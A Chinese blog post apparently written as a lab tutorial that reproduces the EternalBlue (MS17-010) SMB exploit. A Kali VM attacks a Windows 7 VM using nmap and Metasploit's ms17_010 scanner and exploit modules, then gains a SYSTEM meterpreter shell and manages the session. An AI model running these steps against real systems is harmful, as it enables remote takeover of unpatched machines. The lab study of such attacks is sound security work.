永恒之蓝漏洞复现

已于 2024-06-23 22:39:38 修改
阅读量522 收藏 3
点赞数 7
分类专栏: 漏洞复现 网络安全 kali 文章标签: 经验分享 linux 网络安全
于 2024-06-22 11:24:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45240382/article/details/139879442
版权

永恒之蓝漏洞复现

漏洞背景:
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
存在漏洞的主机只需要开放445端口即可被攻击,获取系统最高权限。

环境准备:

  • 攻击端 Linux kali:192.168.214.128
  • 被攻击端 win 7 x64:192.168.214.129(关闭防火墙)

一、扫描端口

使用 nmap 扫描目标端口;

nmap 192.168.214.129

查看结果:445端口为开放状态,操作系统为 win 7;
image.png

二、扫描漏洞

调用 msf 工具选择永恒之蓝扫描模块,进行漏洞扫描

  1. 调用 msf 工具;
msfconsole

image.png

  1. 选择漏洞扫描模块;
# 搜索永恒之蓝相关模块(ms17_010)
search ms17_010
# 选择扫描模块
use 3

image.png

  1. 查看运行永恒之蓝攻击的必需参数;
show options

image.png

  1. RHOSTS为目标主机,必需项;
set rhosts 192.168.214.129

image.png

  1. 运行扫描
run

image.png

显示目标主机很可能会受到永恒之蓝漏洞的攻击。

三、漏洞攻击

  1. 选择漏洞攻击模块;
# 搜索永恒之蓝相关模块(ms17_010)
search ms17_010
# 选择攻击模块
use 0

image.png

  1. 查看参数;
show options

image.png

  1. 设置RHOSTS;
set rhosts 192.168.214.129

image.png

  1. 运行攻击;
run

image.png

攻击成功后返回一个 meterpreter 会话,通过该会话可以控制目标主机system权限。

  1. 输入 shell 即可进入win7的cmd;
# 进入命令行
shell
# 切换字符集编码,解决乱码问题
chcp 65001

image.png

  1. 查看主机信息;

image.png

四、放入后台

  1. 将会话放入后台,方便后续调用;
# 退出cmd
exit
# 将当前会话放入 msf 后台
background

image.png

  1. 查看会话并调用
# 查看所有已连接的会话
sessions
# 调用指定会话
sessions -i 1

image.png

zneVue.
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
m0_65712192的博客
11-01 3万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
MS17-010(永恒之蓝)漏洞复现和分析
daoshiwa的博客
09-21 3450
永恒之蓝
永恒之蓝漏洞解析
xhx836161547的博客
02-08 2314
永恒之蓝实验报告
永恒之蓝漏洞
m0_73481504的博客
03-26 720
利用漏洞ms17-010漏洞 攻击对方主机进行文件数据的修改需要2台主机 server2008 ,kali第一步,打开两台主机 先要知道被攻击者的ip地址第二步, 打开kali对其ip地址进行扫描扫描ip地址的全部端口 nmap -sV -p- +ip地址nmap -sV -O +ip地址 查看对方系统的版本信息-O识别系统版本-sV 识别具体服务版本扫描到永恒之蓝第三步 ,找到漏洞 利用漏洞启动msf使用ms17_010攻击成功 ps 查看对方开启的进程查看对方主机界面。
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 6078
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝复现kaliwin7
最新发布
07-19
### 恒之蓝漏洞复现:Kali Linux 攻击 Windows 7 #### 实验背景及目的 “永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验...
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
永恒之蓝检测工具MS17-010漏洞扫描工具
局域网内批量扫描永恒之蓝(勒索病毒)漏洞脚本
05-17
依据腾讯发布的勒索病毒漏洞扫描工具,编写了一个简单的批量扫描脚本,可以扫描C类网所有电脑是否存在漏洞需要修复,可根据实际需要修改IP地址范围。扫描结果以txt文件保存。 运行scannsa.bat,依次输入: 1.C类IP地址段,例如:192.168.1 2.起始IP,例如:2(默认为1) 3.结束IP,例如:254(默认为255)
永恒之蓝漏洞利用攻击以及修复方法
Gjqhs的博客
12-12 6976
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了.
使用ms17-010对win7进行渗透(传说中的永恒之蓝
热门推荐
xiaopan233的博客
09-21 4万+
本实验在虚拟机环境下进行! 准备虚拟机两台: Kali Win7 64位 (要将防火墙关闭) 先看看两台机器的ip地址是多少 kali的ip是 192.168.0.102 win7的ip是192.168.0.101 接着进行端口扫描 使用kali的nmap工具进行扫描,在kali终端输入nmap –sS –sV –Pn 192.168.0.101即可进行扫描,-sS 是半开放扫...
永恒之蓝漏洞复现(ms17-010)
weixin_43913009的博客
04-01 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、永恒之蓝(Eternal Blue)二、复现环境三、复现过程1.主机发现2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(Eternal Blue) 永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏.
网络安全攻击手段之永恒之蓝【MS17_010】利用及漏洞剖析
一凡凡凡人的博客
08-18 6642
声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!! 永恒之蓝利用方法 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 目标靶机:windows2008Server(存在MS17_010漏洞) 操作机系统:Kali linux 攻击机...
永恒之蓝漏洞复现流程
09-01
- *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值